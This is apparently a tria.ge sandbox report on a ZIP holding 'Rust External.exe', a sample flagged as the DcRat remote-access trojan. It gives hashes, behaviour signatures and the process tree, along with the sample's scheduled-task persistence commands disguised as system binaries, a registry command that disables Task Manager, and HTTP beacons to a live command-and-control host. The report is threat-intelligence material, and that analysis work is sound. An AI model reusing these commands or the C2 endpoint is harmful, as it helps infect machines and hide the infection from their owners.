Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    72s
  • max time network
    62s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/01/2025, 20:09 UTC

General

  • Target

    lithium external.zip

  • Size

    2.5MB

  • MD5

    5abaa60461ee4c19647911a8d9a0006a

  • SHA1

    76cc97f0581d174087f96f058d898b42e8c566a2

  • SHA256

    1605702f0909585b220918e1cbd6b236f5c47714a978990c7d5b43504b90163d

  • SHA512

    93f3d6b3849a2d9c5b81e9fd96cc60d065e5916ff470e974f2b9b5f49462f25ea18b1f4f32c1fe4f3a3c05eb214e1d5e0f6f25f443a5bb3d338eed2471c0f4f3

  • SSDEEP

    49152:aBIg2+HpqXdLYyrF7SUZSiwaJXA78bixRz4S87jaeg7hRFIz39O:o0NLLFSaJsxR4So+eg7hczA

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Process spawned unexpected child process 48 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 12 IoCs
  • DCRat payload 4 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Disables Task Manager via registry modification
  • Checks computer location settings 2 TTPs 11 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 11 IoCs
  • Checks whether UAC is enabled 1 TTPs 8 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 10 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 48 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs
  • System policy modification 1 TTPs 12 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\lithium external.zip"
    1⤵
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:4968
    • C:\Users\Admin\AppData\Local\Temp\7zO863B5CC7\Rust External.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO863B5CC7\Rust External.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4076
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Agentcomponentdriver\cF2nsYK.vbe"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2344
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Agentcomponentdriver\gyWUCXXRJzCMxdWE9QlvhicilMz.bat" "
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:436
          • C:\Agentcomponentdriver\PortDll.exe
            "C:\Agentcomponentdriver\PortDll.exe"
            5⤵
            • UAC bypass
            • Checks computer location settings
            • Executes dropped EXE
            • Checks whether UAC is enabled
            • Drops file in Program Files directory
            • Drops file in Windows directory
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            • System policy modification
            PID:3300
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KjrLCSMPDQ.bat"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1264
              • C:\Windows\system32\w32tm.exe
                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                7⤵
                  PID:1456
                • C:\Users\Default User\services.exe
                  "C:\Users\Default User\services.exe"
                  7⤵
                  • UAC bypass
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  • Modifies registry class
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  • System policy modification
                  PID:2592
                  • C:\Windows\System32\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\36f4394c-bc31-4c88-aa13-67d0f187b9e5.vbs"
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:740
                    • C:\Users\Default User\services.exe
                      "C:\Users\Default User\services.exe"
                      9⤵
                      • UAC bypass
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Checks whether UAC is enabled
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      • System policy modification
                      PID:3568
                      • C:\Windows\System32\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6ef5a38b-c1c4-4630-8c9b-7b738a718e49.vbs"
                        10⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4896
                        • C:\Users\Default User\services.exe
                          "C:\Users\Default User\services.exe"
                          11⤵
                          • UAC bypass
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Checks whether UAC is enabled
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:3412
                          • C:\Windows\System32\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6bbac697-2e07-4ead-8da0-d093ab0a0e98.vbs"
                            12⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2856
                            • C:\Users\Default User\services.exe
                              "C:\Users\Default User\services.exe"
                              13⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5032
                          • C:\Windows\System32\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3ab3f168-732d-4d14-a5da-db7f6df85643.vbs"
                            12⤵
                              PID:3956
                        • C:\Windows\System32\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3bd2fcca-730f-4671-9571-452db9c63f2b.vbs"
                          10⤵
                            PID:3440
                      • C:\Windows\System32\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6dcd6085-0ac4-4210-aedb-7337dfc48147.vbs"
                        8⤵
                          PID:3992
                  • C:\Windows\SysWOW64\reg.exe
                    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Modifies registry key
                    PID:4684
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Agentcomponentdriver\sihost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3084
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Agentcomponentdriver\sihost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3076
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 5 /tr "'C:\Agentcomponentdriver\sihost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4252
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Templates\csrss.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2644
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\All Users\Templates\csrss.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:880
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Templates\csrss.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1576
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4100
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3484
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:228
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Agentcomponentdriver\Idle.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1572
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Agentcomponentdriver\Idle.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2296
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Agentcomponentdriver\Idle.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1672
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Agentcomponentdriver\smss.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4408
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Agentcomponentdriver\smss.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:404
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Agentcomponentdriver\smss.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4484
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 14 /tr "'C:\Agentcomponentdriver\StartMenuExperienceHost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2076
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Agentcomponentdriver\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3168
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Agentcomponentdriver\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:5116
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Cookies\sppsvc.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4896
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Default\Cookies\sppsvc.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4160
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Cookies\sppsvc.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3092
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Recent\sihost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:5060
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default\Recent\sihost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2300
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Recent\sihost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4676
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Internet Explorer\fr-FR\TextInputHost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2648
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\fr-FR\TextInputHost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4632
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Internet Explorer\fr-FR\TextInputHost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3316
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 5 /tr "'C:\Windows\Fonts\sihost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2028
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Windows\Fonts\sihost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2064
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Windows\Fonts\sihost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4368
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1476
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4612
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4692
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Users\Default\PrintHood\csrss.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2936
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default\PrintHood\csrss.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3968
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Users\Default\PrintHood\csrss.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:5076
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\services.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4500
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Default User\services.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4344
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\services.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2944
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "7zFM7" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\7zFM.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2856
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "7zFM" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\7zFM.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4940
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "7zFM7" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\7zFM.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2488
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Agentcomponentdriver\wininit.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3504
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Agentcomponentdriver\wininit.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1140
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Agentcomponentdriver\wininit.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3220
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Agentcomponentdriver\csrss.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4584
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Agentcomponentdriver\csrss.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2160
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Agentcomponentdriver\csrss.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1900
          • C:\Windows\System32\rundll32.exe
            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            1⤵
              PID:428
            • C:\Users\Admin\Downloads\Rust External.exe
              "C:\Users\Admin\Downloads\Rust External.exe"
              1⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              • Suspicious use of WriteProcessMemory
              PID:836
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Agentcomponentdriver\cF2nsYK.vbe"
                2⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4180
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Agentcomponentdriver\gyWUCXXRJzCMxdWE9QlvhicilMz.bat" "
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1660
                  • C:\Agentcomponentdriver\PortDll.exe
                    "C:\Agentcomponentdriver\PortDll.exe"
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3936
                  • C:\Windows\SysWOW64\reg.exe
                    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                    4⤵
                    • System Location Discovery: System Language Discovery
                    • Modifies registry key
                    PID:4104
            • C:\Users\Admin\Downloads\Rust External.exe
              "C:\Users\Admin\Downloads\Rust External.exe"
              1⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              • Suspicious use of WriteProcessMemory
              PID:2892
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Agentcomponentdriver\cF2nsYK.vbe"
                2⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3780
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Agentcomponentdriver\gyWUCXXRJzCMxdWE9QlvhicilMz.bat" "
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3648
                  • C:\Agentcomponentdriver\PortDll.exe
                    "C:\Agentcomponentdriver\PortDll.exe"
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:628
                  • C:\Windows\SysWOW64\reg.exe
                    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                    4⤵
                    • System Location Discovery: System Language Discovery
                    • Modifies registry key
                    PID:2560
            • C:\Windows\system32\taskmgr.exe
              "C:\Windows\system32\taskmgr.exe" /7
              1⤵
                PID:1736
              • C:\Users\Admin\Downloads\Rust External.exe
                "C:\Users\Admin\Downloads\Rust External.exe"
                1⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Modifies registry class
                • Suspicious use of WriteProcessMemory
                PID:4132
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Agentcomponentdriver\cF2nsYK.vbe"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:908

              Network

              • flag-us
                DNS
                133.211.185.52.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                133.211.185.52.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                85.49.80.91.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                85.49.80.91.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                72.32.126.40.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                72.32.126.40.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                7.98.51.23.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                7.98.51.23.in-addr.arpa
                IN PTR
                Response
                7.98.51.23.in-addr.arpa
                IN PTR
                a23-51-98-7deploystaticakamaitechnologiescom
              • flag-us
                DNS
                97.17.167.52.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                97.17.167.52.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                209.205.72.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                209.205.72.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                197.87.175.4.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                197.87.175.4.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                241.42.69.40.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                241.42.69.40.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                172.210.232.199.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                172.210.232.199.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                29358cm.darkproducts.ru
                services.exe
                Remote address:
                8.8.8.8:53
                Request
                29358cm.darkproducts.ru
                IN A
                Response
                29358cm.darkproducts.ru
                IN A
                172.67.194.232
                29358cm.darkproducts.ru
                IN A
                104.21.12.142
              • flag-us
                GET
                http://29358cm.darkproducts.ru/L1nc0In.php?z3yg=JTirXuMZcq4xxpeNiLET0mYvy&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&z3yg=JTirXuMZcq4xxpeNiLET0mYvy
                services.exe
                Remote address:
                172.67.194.232:80
                Request
                GET /L1nc0In.php?z3yg=JTirXuMZcq4xxpeNiLET0mYvy&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&z3yg=JTirXuMZcq4xxpeNiLET0mYvy HTTP/1.1
                Accept: */*
                Content-Type: text/javascript
                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                Host: 29358cm.darkproducts.ru
                Connection: Keep-Alive
                Response
                HTTP/1.1 200 OK
                Date: Sun, 26 Jan 2025 20:09:45 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: keep-alive
                Last-Modified: Mon, 09 Dec 2024 16:26:02 GMT
                Accept-Ranges: bytes
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n7tvzzSuBccEKgthy%2BocxvMDTWi5vkrBCe9w2OghaSCcm72CdJv6Ro4xBWRghCv5ZSfHn6%2BuiNY7bZrv091PBQHCOLuMpgRlknPL6yQfliabunJYTi1w7cZxViEPq%2B3Ko%2FDBhan%2ByR2tag%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 908324776fc7f1b6-LHR
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=44961&min_rtt=44961&rtt_var=22480&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=471&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              • flag-us
                GET
                http://29358cm.darkproducts.ru/L1nc0In.php?z3yg=JTirXuMZcq4xxpeNiLET0mYvy&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&z3yg=JTirXuMZcq4xxpeNiLET0mYvy
                services.exe
                Remote address:
                172.67.194.232:80
                Request
                GET /L1nc0In.php?z3yg=JTirXuMZcq4xxpeNiLET0mYvy&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&z3yg=JTirXuMZcq4xxpeNiLET0mYvy HTTP/1.1
                Accept: */*
                Content-Type: text/javascript
                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                Host: 29358cm.darkproducts.ru
                Response
                HTTP/1.1 200 OK
                Date: Sun, 26 Jan 2025 20:09:46 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: keep-alive
                Last-Modified: Mon, 09 Dec 2024 16:26:02 GMT
                Accept-Ranges: bytes
                cf-cache-status: DYNAMIC
